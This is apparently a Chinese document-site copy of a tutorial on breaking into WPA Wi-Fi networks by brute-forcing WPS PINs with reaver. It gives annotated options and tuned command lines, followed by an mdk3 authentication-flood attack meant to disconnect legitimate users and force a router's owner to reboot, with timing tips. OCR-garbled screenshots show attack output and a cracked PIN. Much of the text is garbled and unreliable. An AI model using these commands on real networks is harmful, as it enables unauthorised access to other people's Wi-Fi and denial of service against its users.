版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
1、破解 WPA 時(shí), PIN 出現(xiàn)死循環(huán)處理方法。如下面這個(gè)例子,一開始,或者破解一段時(shí)間后出來 PIN 無限循環(huán):本人經(jīng)過多次實(shí)驗(yàn)最后總結(jié)了解決的辦法:Required Arguments:-i, -interface=<wlan> Name of the monitor-mode interface to use 網(wǎng)卡的監(jiān)視接口,通常是 mon0-b, -bssid=<mac> BSSID of the target APAP的MAC地址Optional Arguments:-m, -mac=<mac> MAC of the host system指定本機(jī)
2、MAC地址,在AP有MAC過濾的時(shí)候需要使用-e, -essid=<ssid> ESSID of the target AP路由器的ESSID, 般不用指定-c, -channel=<channel>Set the 802.11 channel for the interface (implies -f)信號(hào)的頻道,如果不指定會(huì)自動(dòng)掃描-o, -out-file=<file>Send output to a log file stdout標(biāo)準(zhǔn)輸出到文件-s, -session=<file> Restore a previous session f
3、ile 恢復(fù)進(jìn)程文件-C, -exec=<command> Execute the supplied command upon successful pin recovery pin 成功后執(zhí)行命令-D, -daemonize Daemonize reaver設(shè)置 reaver 成 Daemon-a, -auto Auto detect the best advanced options for the target AP 對(duì)目標(biāo) AP 自動(dòng)檢測高級(jí)參數(shù)-f, -fixed Disable channel hopping 禁止頻道跳轉(zhuǎn)-5, -5ghz Use 5GHz 802.1
4、1 channels使用 5G 頻道-v, -verbose Display non-critical warnings (-vv for more) 顯示不重要警告信息 -vv 可以顯示更多-q, -quiet Only display critical messages 只顯示關(guān)鍵信息-h, -help Show help顯示幫助Advanced Options:-p, -pin=<wps pin> Use the specified 4 or 8 digit WPS pin直接讀取psk (本人測試未成功,建議用網(wǎng)卡自帶軟件獲取)-d, -delay=<seconds&
5、gt; Set the delay between pin attempts 1pin 間延時(shí),默認(rèn) 1 秒,推薦設(shè) 0-l, -lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts 60 AP鎖定WPS后等待時(shí)間-g, -max-attempts=<num>Quit after num pin attempts最大 pin 次數(shù)-x, -fail-wait=<seconds> Set the time to sleep after 10 unexpected f
6、ailures 010 次意外失敗后等待時(shí)間,默認(rèn) 0 秒-r, -recurring-delay=<x:y>Sleep for y seconds every x pin attempts每x次pin后等待y秒-t, -timeout=<seconds> Set the receive timeout period 5 收包超時(shí),默認(rèn) 5 秒-T, -m57-timeout=<seconds>Set the M5/M7 timeout period 0.20M5/M7 超時(shí),默認(rèn) 0.2 秒-A, -no-associate Do not associat
7、e with the AP (association must be done by another application)不連入AP (連入過程必須有其他程序完成)-N, -no-nacks Do not send NACK messages when out of order packets are received 不發(fā)送 NACK 信息(如果一直 pin 不動(dòng),可以嘗試這個(gè)參數(shù))-S, -dh-small Use small DH keys to improve crack speed使用小 DH 關(guān)鍵值提高速度(推薦使用)-L, -ignore-locks Ignore locke
8、d state reported by the target AP 忽略目標(biāo) AP 報(bào)告的鎖定狀態(tài)-E, -eap-terminate Terminate each WPS session with an EAP FAIL packet每當(dāng)收到EAP失敗包就終止WPS進(jìn)程-n, -nack Target AP always sends a NACK Auto對(duì)目標(biāo)AP總是發(fā)送NACK,默認(rèn)自動(dòng)-w, -win7 Mimic a Windows 7 registrar False模擬 win7 注冊,默認(rèn)關(guān)閉 個(gè)人心得 對(duì)一個(gè)即剛開始pin的時(shí)候打開-vv參數(shù),如果順利,就中斷,然后改成-v繼續(xù)
9、pin,反正進(jìn) 度是可以保存的reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S如果一直 pin 不動(dòng),嘗試加 -N 參數(shù)reaver -i monO -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -NAP 洪水攻擊1 、打氣筒 mdk3 攻擊模式操作方法首先檢測網(wǎng)卡:ifconfig -a然后模擬端口:airmon-ng start wlan0接下來用:airodump-ng mon0掃描 ap 找到你 pin 死的路由器 mac用 mdk3 做身份驗(yàn)證攻擊mdk3 mon0 a -a mac (被 pin 死的路由
10、器的 mac)身份驗(yàn)證攻擊效果說明:此攻擊是針對(duì)無線AP的洪水攻擊,又叫做身份驗(yàn)證攻擊。其原理就是向 AP發(fā)動(dòng)大量的虛假 的鏈接請求,這種請求數(shù)量一旦超 過了無線AP所能承受的范圍,AP就會(huì)自動(dòng)斷開現(xiàn)有鏈接, 使合法用戶無法使用無線網(wǎng)絡(luò)。迫使路由主人重啟路由器。說明:此命令功能強(qiáng)大,使用錯(cuò)誤會(huì)造成所有 ap 不能使用, 請指定 mac 地址 ,然后使用,其余命 令不要亂試。你要使用此命令的其他參數(shù),請?jiān)敿?xì)閱讀此命令參數(shù)詳解2、 CDlinux mdk3 攻擊模式操作方法首先進(jìn)入CDIinux,打開水滴或者打氣筒搜索 pin死的MAC地址(直接打開螃蟹或者 3070驅(qū)動(dòng)搜索無線 MAC 地址也
11、OK)。然后點(diǎn)擊左下角 CDlnux圖標(biāo),依次打開無線安全mdk3-v6啟動(dòng)程序rcpldy ny replay na>1終喇7文件管理器 Q網(wǎng)緒瀏覽器Q辦公 a多媒體 d附件.-圖形圖像cowpatty-4,6 dm Iff網(wǎng)絡(luò)嘎撩enercapFeedingBottielnflator 1.0夫于 CDIinux關(guān)于XfceQ T皚iiTf!0 macchanger MA 匚修改 mdk3-* tcpdumpf XHydrakismet-2010-R1為你pin死的路由的MAC進(jìn)入 mdk3后輸入命令 mdk3monO a -a 40:16:9F:*:2C:B2(40:16:9F:*
12、:2C:B2注意空格和大小寫)mdk3-v6a - Authentication BoS modeSends authentication frames to 11 fiPs Found in range«Too nuch client® freeze or reset sane RPs* p - Basic probing and ESSID Eruteforce modeProbes AP and check far answerj useful for checkin if SSID has been correctly decloaked or if AP is i
13、n your adaptors sending range SSID Bruteforcing is also possible with this test rode*d - Beauthenticatior / Eixassociation Amok ModeKicks 亡如ody found from AF'n - Michael shutdown exploitation (TKIP)Cancels al 1 traffic continuouslyx- 802.1X testszi UIDS/UIPS ConfusionConfuse/Abuse Intrusion Dete
14、ction and Prevention SystemsF - MAC fi比呂r bruteforce nodeThis test uses $ list of known client MAC fldresses 騎d tries to authentiunte then to the giyen AP while dMnamicallu changing :its response timeout for best perFornancet It curr-ently workm only on RPs who deny an open authentication request pr
15、operly g - UFA Eowngrde testpin死的路由是回車后進(jìn)入攻擊模式,時(shí)間不要太長,最多半分鐘就可以關(guān)閉對(duì)話框然后重新掃描網(wǎng)絡(luò)看 不是已經(jīng)不在了。等待主人重啟吧Connecting Ckentt 671C6:63:73:51iFF to target APt 40; 1.6:9F|:2C;B2 AP 4O:1E:9F:®:2C:B2 is respondinsFwConnectingCnent:4E:35;61;15:5S:D1totargetAP:40:16:9F:w:2C:B2ConnectingClient!AA;FA:06:24:E2|06totrget
16、fiPj40;16:9F:C:2C;B2ConnectingClient:01:96tl7:94t2A:00totargetAP:40:16i9F:ff):2C:B2AP 4O:1S:9F#:2C:B2 se巳舲 to be INVULNERABLE!1Beuice is still responding with 500 clients connected! 、 Connecting Client: C7:51:E4:E7;6E:27 to target AP:. 40:16i9F:«:2CiB2 Connecting Client: B5:6D:32:C4:FF:05 to ta
17、rget AP: 40:16:9F:B:2C:12 AP 40:16:9F®:2C:B2 to be INVULNERABLE IKBevice is stn1 responding with 1000 clients connected!Connecting Client: 45:FC:25:73:3C:D9 to target AP: 4O:16:3F1W2C:B2 Connecting Client: 73:DH:C4:5C:OC:1E to target AP: 40:lS:3F:s2C:B2 Connecting Cent: 17:99:7E:7i:B5:DD to tar
18、get AP: 40:LG:9F:B2 AP 40:16:9F«2C:B2 seems to be INVULNERABLE!舉leyice is st Hl responding with 150C cl ients connected!Connecting Client: 90x9Et65:67:71$B8 to target AP: 40:16:9F»hC:B2 Connecting Client; 6EiB4:6S:9E:ABj3B to target APt 40i 16:9F:®:2CiB2 Connecting Cbent: El):00:18:8F
19、:AE!:00 to target AP: 40:16:9F:»2C:B2 AP謝:越訃卻叢嚴(yán) to be INVULNERABLE tTEk-j ice. is Ltfu l "耳孑沖3 with 2000 clients connected IConnect itio Ci lent;卩巧.* 開:9C:E8:CP to target AP: 40tl6;9F Jfc:2C:B2 Packets sent:190 padkets/sec|*非CDLinux可以在這里啟動(dòng)命令輸入框HomeJrrflator 1.0©運(yùn)行程序.ini dwe p-gtkW網(wǎng)蠟瀏寶
20、誥ilart NetWork謄訊QQi(opN&tWorkWPSCrackGUI文件肓理器戢 ffrat;-關(guān) f CDlinux卜 £L GPartedA TesOlskllSSffiSiiET ThuM文件育理菇安裝 CDIinux 亨出命宕 13 fffis厘器M 一蛉諸程序-坦堀用戶價(jià)式1只有客戶端在線時(shí)進(jìn)行攻擊才可能達(dá)到迫使重啟目的,信號(hào)越強(qiáng),效果越佳。2、每次攻擊最好不超5min,否則卡死(看機(jī)器配置),稍停 1min在進(jìn)行攻擊,連續(xù)攻擊三 次應(yīng)該就可以了!8C210A pin重碼或者pin死路由器的解決辦法(我驗(yàn)證貌似有效)WHAWHA掃插6:匚 3:DATP
21、LINMERCUI4:E6:E4:36:D4:02PC*1in24n60-i_14:E6:E4:78:CC:54ih-linC:21:OA:CC:FE:Oa TP-LINKi15:23:12->Utaintptcod®* 0x02j 7 ie-triX拼死路由器后,整整一晚上沒有在找到這個(gè)信號(hào),今天起床在看,發(fā)現(xiàn)又出來了,繼續(xù)拼,發(fā)現(xiàn),重碼非常非常的嚴(yán)重,今天中午放棄 N次,今晚在小試一下,加了參數(shù)后,大減少重碼,堅(jiān)持就是勝利,往下看。j mlnidwep-gtk-30122看看我重碼拼死后,的時(shí)候reaver mlnidwep-gtk0x02), re-trying last
22、iLrijjjng p in 37312145JSending tPUL SIHHI request Received identity request Sending identity response Received Ml messageSending M2 nessag已 *mDMT卜i* Qo j in* *in)eout occurred jrii wSending (JSC NACK世FEf ai 回 (code;Urging pin 37312138 SendTng LaHOL 51 UKl- requestReceived identity requet Sending id
23、entity response Received Ml messageSending H2 messageReceived M3 tieseageSending M4 mgwwaggReceived! M5 message Sending N6 message Received WSC NACKSendinoJSCUWCEpiri無蟒網(wǎng)卡路由MAC客戶ttMACwlnQWPA2WP/WPA2WPAR總字典信道EC:17:2F:46:E1:32 LOU加密方式30:8ngngE退出lAnywIdn-她xomIV5數(shù)總:D-721 WPA2WPAA# ItwlanO RalinkRT2B70/30
24、70 HMOOuSb - (phy?|8C:21:0A;79;84:54_TP-LlNK_798O»-39_11_WPA2_wp1 WPA2WPA_wps6 WPA2WPAReaver名禰 強(qiáng)度信遣加密方式WPAZWPA2 :方式述擇一 H Aireplay ng | 的 Aireplar'Aireplayr ireplia ' AireplayAireplay726 WPA2WPAAttack Cm喘(set th巳 options gou 佃nt balow, wighoutreader -i mon2 -b 8C:21:0A:79;. -' -a 6 -
25、e 'TP-LINK_79r ' -S -uv -n4+I+ .4UPS transaction failed (codel 0x03)re-trying last pinTrying pin 37318840Sending EAPOL START requestReceived identity requestSending identity responseReceived Ml nessgeSending H2 messageReceived H3 nesseSending M4 messageReceived M3 messageSending MSC IWKSendi
26、ng USC NACKWPS transaction failed (code: 0x03), re-trying lcist pin 98,96 complete 2012-09-1G 02;45:53 (6 seconds/pin) Trying pin 3731G840Sending E9P0L START requestReceived identity requestding identit responseReceived Ml怖亡酩ag亡Sending M2 rnessaee豌3臨T罠噸:沖左廣出運(yùn)Afc臂以:Senditl WSCUPS transaction iailed (
27、oode 0x03)T re-trying last pinReceived MlSending USC NACKSending U5C NACKUPS transaction failed (code: 0x03)re-trying last pin Trying pin 37318840Sendins EAPOL START requestReceived identity requestSending identity responseReceiued Ml MessageSending 12 messaeReceived Ml messageSending USE NACKSendin
28、g USC NACKUPS transaction bailed (code: 0x03). re-trying last pin Trying pin 37318340Sending EAPOL START requestReceived identity requestSending identity resporseReceived Ml nsssageSending N2 mesw&g呂+ '哼7 HE i爛今日日匚*】匕“訃眄N4勺t心笨十Rec'ri'jeti FI5 ml廣旳# .+ 5的di ng 16 m喪事慕",看到了吧,重碼,不過
29、,是偶偶的了,加了參數(shù)后,不會(huì)像昨天和今天上午那樣,一直重碼一個(gè)碼不動(dòng)了 下看,奇跡出現(xiàn)了。.在往 3 CIIK-QVUU-1UII I d 1 ICU!VAV J/ r I 匸 VI |ll 11- 11P98+96i! coniplete 2012-09-18 02:46:03 (6 seccnds/pin.) Trying pin 37318840Sending EAPOL STAftT requestReceived identity requestSanding identity response Received ItLSending M2 massageRwived M3Sending Md message Received 陌 wesssge Sending MG messagei+j + 【+】 +】 <Received H7 wessage Sending USt NACK Sending liJSC NACKPin cracked in 5857 secondsUPS PIN: 4371MfrasE aug key tDPin碼重復(fù)出現(xiàn)死循環(huán)解決辦法1. xiaopanOS環(huán)境解決之道:當(dāng)你看到PIN到一定程度,窗口里的 PIN碼不變、進(jìn)度百分比也不走,那么,保持原窗口不變,再點(diǎn)擊 ROOTSHEL圖標(biāo),新開一個(gè) PIN窗口,
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年山東淄博市博山區(qū)“服務(wù)基層人才專項(xiàng)”招募204人管理單位筆試遴選500模擬題附帶答案詳解
- 2025年山東濟(jì)寧經(jīng)發(fā)投資集團(tuán)限公司公開招聘27人管理單位筆試遴選500模擬題附帶答案詳解
- 2025年山東濟(jì)寧市城市管理局所屬事業(yè)單位急需緊缺人才引進(jìn)3人管理單位筆試遴選500模擬題附帶答案詳解
- 2025年山東濟(jì)南職業(yè)學(xué)院招聘高層次人才6人歷年管理單位筆試遴選500模擬題附帶答案詳解
- 2025年山東濟(jì)南市天橋區(qū)所屬事業(yè)單位招聘155人歷年管理單位筆試遴選500模擬題附帶答案詳解
- 2025年山東泰安市泰山景區(qū)鄉(xiāng)鎮(zhèn)衛(wèi)生院招聘專業(yè)技術(shù)人員歷年管理單位筆試遴選500模擬題附帶答案詳解
- 開工儀式總包發(fā)言稿范文(9篇)
- 2025年山東棗莊臺(tái)兒莊區(qū)事業(yè)單位初級(jí)綜合類招聘工作人員20人歷年管理單位筆試遴選500模擬題附帶答案詳解
- 2025年山東日照市北經(jīng)濟(jì)開發(fā)區(qū)招聘筆試管理單位筆試遴選500模擬題附帶答案詳解
- 護(hù)士核酸檢測采樣工作總結(jié)范文(6篇)
- 催收品質(zhì)合規(guī)及投訴預(yù)警培訓(xùn)
- 卸料平臺(tái)安裝巡視檢查記錄
- 單位物業(yè)服務(wù)項(xiàng)目投標(biāo)方案(技術(shù)標(biāo))
- TRIZ理論之40個(gè)發(fā)明原理課件
- 酒店宴會(huì)合同范本
- 貨款互抵三方協(xié)議合同范本
- 七年級(jí)道德與法治論文2000字(合集六篇)
- 王朝霞一年級(jí)上冊期末試卷
- 2023年初中英語聽課心得體會(huì) 初中英語聽課心得體會(huì)閱讀(優(yōu)質(zhì))相關(guān)范文多篇集錦
- 高中日語宣講 試聽課件
- 新生兒窒息診斷地專家共識(shí)
評(píng)論
0/150
提交評(píng)論